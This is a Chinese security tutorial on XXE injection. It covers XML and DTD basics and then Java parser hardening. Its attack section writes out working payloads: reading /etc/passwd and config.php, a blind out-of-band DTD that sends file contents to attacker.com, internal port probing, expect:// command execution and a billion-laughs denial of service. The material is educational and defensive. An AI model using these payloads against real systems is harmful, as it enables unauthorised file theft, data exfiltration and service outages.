XXE漏洞全面解析与防御指南<\/h1>

XML基础<\/h2>

XML语法规则<\/h3>
所有XML元素必须有闭合标签<\/li>
XML标签对大小写敏感<\/li>
XML必须正确嵌套<\/li>
XML文档必须有根元素<\/li>
XML属性值必须加引号<\/li>
特殊字符需使用实体引用（如<<\/code>用<<\/code>，><\/code>用><\/code>）<\/li>
XML中空格会被保留<\/li>
<\/ul>
XML结构组成<\/h3>

文档声明<\/strong>：<?xml version="1.0" encoding="utf-8"?><\/code><\/li>
元素<\/strong>：XML主要构建模块，可包含文本、其他元素或为空
<message><\/span>some message<\/message><\/span>
<\/span><\/span><\/code><\/pre><\/li>
属性<\/strong>：提供元素的额外信息

<\/span><\/span><\/code><\/pre><\/li>
实体<\/strong>：定义引用普通文本或特殊字符的快捷方式变量<\/li>
<\/ol>
实体类型<\/h3>

字符实体<\/strong>：预定义实体如&lt;<\/code>, &gt;<\/code><\/li>
命名实体<\/strong>：自定义实体
<!ENTITY writer "Bill Gates"><\/span>
<\/span><\/span><\/code><\/pre><\/li>
外部实体<\/strong>：引用外部资源
<!ENTITY writer SYSTEM "http:\/\/example.com\/dtd\/entities.dtd"><\/span>
<\/span><\/span><\/code><\/pre><\/li>
参数实体<\/strong>：只能在DTD中使用
<!ENTITY % name "value"><\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
DTD（文档类型定义）<\/h2>
内部声明<\/h3>
<!DOCTYPE note [
<\/span><\/span><\/span>  <!ELEMENT note (to,from,heading,body)><\/span>
<\/span><\/span>  <!ELEMENT to (#PCDATA)><\/span>
<\/span><\/span>  <!ELEMENT from (#PCDATA)><\/span>
<\/span><\/span>  <!ELEMENT heading (#PCDATA)><\/span>
<\/span><\/span>  <!ELEMENT body (#PCDATA)><\/span>
<\/span><\/span>]>
<\/span><\/span><\/code><\/pre>外部引用<\/h3>
<!DOCTYPE note SYSTEM "note.dtd"><\/span>
<\/span><\/span><\/code><\/pre>PCDATA与CDATA<\/h3>

PCDATA<\/strong>：会被解析器解析的文本，不能包含&<\/code>, <<\/code>, ><\/code><\/li>
CDATA<\/strong>：不会被解析的文本，格式：<![CDATA[ 内容 ]]><\/code><\/li>
<\/ul>
XXE漏洞原理<\/h2>
XXE（XML External Entity Injection）即XML外部实体注入，当解析XML时允许解析恶意外部实体，导致：<\/p>

文件读取<\/li>
命令执行<\/li>
内网端口扫描<\/li>
内网攻击<\/li>
拒绝服务攻击<\/li>
<\/ul>
攻击条件<\/h3>

解析XML输入<\/li>
XML内容外部可控<\/li>
未禁用外部实体<\/li>
<\/ol>
XXE攻击类型与利用<\/h2>
1. 有回显文件读取<\/h3>
<?xml version="1.0" encoding="utf-8"?><\/span>
<\/span><\/span><!DOCTYPE test[
<\/span><\/span><\/span>  <!ENTITY bee SYSTEM "file:\/\/\/etc\/passwd"><\/span>
<\/span><\/span>]>
<\/span><\/span><reset><\/span>
<\/span><\/span>  <login><\/span>&bee;<\/login><\/span>
<\/span><\/span>  <secret><\/span>Any bugs?<\/secret><\/span>
<\/span><\/span><\/reset><\/span>
<\/span><\/span><\/code><\/pre>2. 无回显(Blind XXE)<\/h3>
利用外带数据：<\/p>

攻击者服务器创建evil.dtd：
<!ENTITY % file SYSTEM "file:\/\/\/etc\/passwd"><\/span>
<\/span><\/span><!ENTITY % dtd "<!ENTITY data SYSTEM 'http:\/\/attacker.com\/?%file;'><\/span>">
<\/span><\/span><\/code><\/pre><\/li>
发送恶意XML：
<?xml version="1.0"?><\/span>
<\/span><\/span><!DOCTYPE hack[
<\/span><\/span><\/span>  <!ENTITY % send SYSTEM "http:\/\/attacker.com\/evil.dtd"><\/span>
<\/span><\/span>  %send;
<\/span><\/span>  %dtd;
<\/span><\/span>]>
<\/span><\/span><r><\/span>&data;<\/r><\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3. 读取PHP等特殊文件<\/h3>
使用Base64编码避免解析问题：<\/p>
<!ENTITY bee SYSTEM "php:\/\/filter\/read=convert.base64-encode\/resource=file:\/\/\/var\/www\/config.php"><\/span>
<\/span><\/span><\/code><\/pre>4. 端口探测<\/h3>
<!ENTITY bee SYSTEM "http:\/\/192.168.1.1:3306"><\/span>
<\/span><\/span><\/code><\/pre>
端口开放：failed to open stream: HTTP request failed!<\/code><\/li>
端口关闭：长时间等待或Connection refused<\/code><\/li>
<\/ul>
5. 命令执行（需expect扩展）<\/h3>
<!ENTITY bee SYSTEM "expect:\/\/id"><\/span>
<\/span><\/span><\/code><\/pre>6. 拒绝服务攻击<\/h3>
<?xml version="1.0"?><\/span>
<\/span><\/span><!DOCTYPE lolz [
<\/span><\/span><\/span>  <!ENTITY lol "abc"><\/span>
<\/span><\/span>  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"><\/span>
<\/span><\/span>  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"><\/span>
<\/span><\/span>  <!-- 继续递归定义 --><\/span>
<\/span><\/span>]>
<\/span><\/span><lolz><\/span>&lol9;<\/lolz><\/span>
<\/span><\/span><\/code><\/pre>Java XXE代码审计<\/h2>
常见易受攻击接口<\/h3>

XMLReader<\/strong><\/li>
SAXBuilder<\/strong><\/li>
SAXReader<\/strong><\/li>
SAXParserFactory<\/strong><\/li>
Digester<\/strong><\/li>
DocumentBuilderFactory<\/strong><\/li>
<\/ol>
安全修复方案<\/h3>
通用修复方法<\/h4>
\/\/ 最佳方案：禁用DTD
<\/span><\/span><\/span><\/span>setFeature(<\/span>"http:\/\/apache.org\/xml\/features\/disallow-doctype-decl"<\/span>,<\/span> true<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 次优方案：禁用外部实体
<\/span><\/span><\/span><\/span>setFeature(<\/span>"http:\/\/xml.org\/sax\/features\/external-general-entities"<\/span>,<\/span> false<\/span>);<\/span>
<\/span><\/span>setFeature(<\/span>"http:\/\/xml.org\/sax\/features\/external-parameter-entities"<\/span>,<\/span> false<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>各接口具体修复<\/h4>

XMLReader<\/strong><\/li>
<\/ol>
XMLReader xmlReader =<\/span> XMLReaderFactory.<\/span>createXMLReader<\/span>();<\/span>
<\/span><\/span>xmlReader.<\/span>setFeature<\/span>(<\/span>"http:\/\/apache.org\/xml\/features\/disallow-doctype-decl"<\/span>,<\/span> true<\/span>);<\/span>
<\/span><\/span>xmlReader.<\/span>setFeature<\/span>(<\/span>"http:\/\/xml.org\/sax\/features\/external-general-entities"<\/span>,<\/span> false<\/span>);<\/span>
<\/span><\/span>xmlReader.<\/span>setFeature<\/span>(<\/span>"http:\/\/xml.org\/sax\/features\/external-parameter-entities"<\/span>,<\/span> false<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>
SAXBuilder<\/strong><\/li>
<\/ol>
SAXBuilder builder =<\/span> new<\/span> SAXBuilder();<\/span>
<\/span><\/span>builder.<\/span>setFeature<\/span>(<\/span>"http:\/\/apache.org\/xml\/features\/disallow-doctype-decl"<\/span>,<\/span> true<\/span>);<\/span>
<\/span><\/span>builder.<\/span>setFeature<\/span>(<\/span>"http:\/\/xml.org\/sax\/features\/external-general-entities"<\/span>,<\/span> false<\/span>);<\/span>
<\/span><\/span>builder.<\/span>setFeature<\/span>(<\/span>"http:\/\/xml.org\/sax\/features\/external-parameter-entities"<\/span>,<\/span> false<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>
SAXReader<\/strong><\/li>
<\/ol>
SAXReader reader =<\/span> new<\/span> SAXReader();<\/span>
<\/span><\/span>reader.<\/span>setFeature<\/span>(<\/span>"http:\/\/apache.org\/xml\/features\/disallow-doctype-decl"<\/span>,<\/span> true<\/span>);<\/span>
<\/span><\/span>reader.<\/span>setFeature<\/span>(<\/span>"http:\/\/xml.org\/sax\/features\/external-general-entities"<\/span>,<\/span> false<\/span>);<\/span>
<\/span><\/span>reader.<\/span>setFeature<\/span>(<\/span>"http:\/\/xml.org\/sax\/features\/external-parameter-entities"<\/span>,<\/span> false<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>
SAXParserFactory<\/strong><\/li>
<\/ol>
SAXParserFactory spf =<\/span> SAXParserFactory.<\/span>newInstance<\/span>();<\/span>
<\/span><\/span>spf.<\/span>setFeature<\/span>(<\/span>"http:\/\/apache.org\/xml\/features\/disallow-doctype-decl"<\/span>,<\/span> true<\/span>);<\/span>
<\/span><\/span>spf.<\/span>setFeature<\/span>(<\/span>"http:\/\/xml.org\/sax\/features\/external-general-entities"<\/span>,<\/span> false<\/span>);<\/span>
<\/span><\/span>spf.<\/span>setFeature<\/span>(<\/span>"http:\/\/xml.org\/sax\/features\/external-parameter-entities"<\/span>,<\/span> false<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>
Digester<\/strong><\/li>
<\/ol>
Digester digester =<\/span> new<\/span> Digester();<\/span>
<\/span><\/span>digester.<\/span>setFeature<\/span>(<\/span>"http:\/\/apache.org\/xml\/features\/disallow-doctype-decl"<\/span>,<\/span> true<\/span>);<\/span>
<\/span><\/span>digester.<\/span>setFeature<\/span>(<\/span>"http:\/\/xml.org\/sax\/features\/external-general-entities"<\/span>,<\/span> false<\/span>);<\/span>
<\/span><\/span>digester.<\/span>setFeature<\/span>(<\/span>"http:\/\/xml.org\/sax\/features\/external-parameter-entities"<\/span>,<\/span> false<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>
DocumentBuilderFactory<\/strong><\/li>
<\/ol>
DocumentBuilderFactory dbf =<\/span> DocumentBuilderFactory.<\/span>newInstance<\/span>();<\/span>
<\/span><\/span>dbf.<\/span>setFeature<\/span>(<\/span>"http:\/\/apache.org\/xml\/features\/disallow-doctype-decl"<\/span>,<\/span> true<\/span>);<\/span>
<\/span><\/span>dbf.<\/span>setFeature<\/span>(<\/span>"http:\/\/xml.org\/sax\/features\/external-general-entities"<\/span>,<\/span> false<\/span>);<\/span>
<\/span><\/span>dbf.<\/span>setFeature<\/span>(<\/span>"http:\/\/xml.org\/sax\/features\/external-parameter-entities"<\/span>,<\/span> false<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 如需支持XInclude
<\/span><\/span><\/span><\/span>dbf.<\/span>setXIncludeAware<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>dbf.<\/span>setNamespaceAware<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>其他防御措施<\/h3>

升级dom4j到2.1.1+（禁用ENTITY）<\/li>
使用白名单过滤用户输入的XML数据<\/li>
对特殊字符<!DOCTYPE<\/code>, <!ENTITY<\/code>, SYSTEM<\/code>, PUBLIC<\/code>进行过滤<\/li>
<\/ol>
总结<\/h2>
XXE漏洞危害严重，防御关键在于：<\/p>

禁用DTD（最优方案）<\/li>
无法禁用DTD时，必须禁用外部实体和参数实体<\/li>
使用安全配置的XML解析器<\/li>
对用户输入进行严格过滤<\/li>
<\/ol>
通过正确配置XML解析器和实施输入验证，可有效防御XXE攻击。<\/p>